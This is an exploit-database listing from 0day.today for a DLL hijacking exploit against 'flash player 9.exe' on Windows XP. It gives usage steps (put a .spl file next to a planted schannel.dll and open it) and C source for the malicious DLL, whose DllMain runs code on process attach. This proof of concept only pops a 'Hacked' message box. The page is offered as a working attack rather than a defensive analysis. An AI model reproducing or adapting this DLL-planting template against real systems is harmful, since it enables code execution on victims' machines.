[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

flash player 9.exe DLL Hijacking Exploit (schannel.dll)

Author
Mohamed Clay
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-13875
Category
local exploits
Date add
27-08-2010
Platform
windows
=======================================================
flash player 9.exe DLL Hijacking Exploit (schannel.dll)
=======================================================

#flash player 9.exe DLL Hijacking Exploit (schannel.dll)
#Author : Mohamed Clay
#Greetz : linuxac.org && isecur1ty.org && security4arabs.com && v4-team.com && all My Friends
#note : EveryOne is happy with DLL Hijacking YooooPiiii!!!!
#Tested on: Windows XP
#Vulnerable Extensions : spl
#How to use : Place a vulnerable extensions file and schannel.dll in same folder and execute the file .

#schannel.dll(code)

===========================================

#include "stdafx.h"

void init() {
MessageBox(NULL,"Mohamed Clay", "Hacked",0x00000003);
}


BOOL APIENTRY DllMain( HANDLE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
 )
{
    switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
 init();break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
 case DLL_PROCESS_DETACH:
break;
    }
    return TRUE;
}

=============================================



#  0day.today [2024-12-24]  #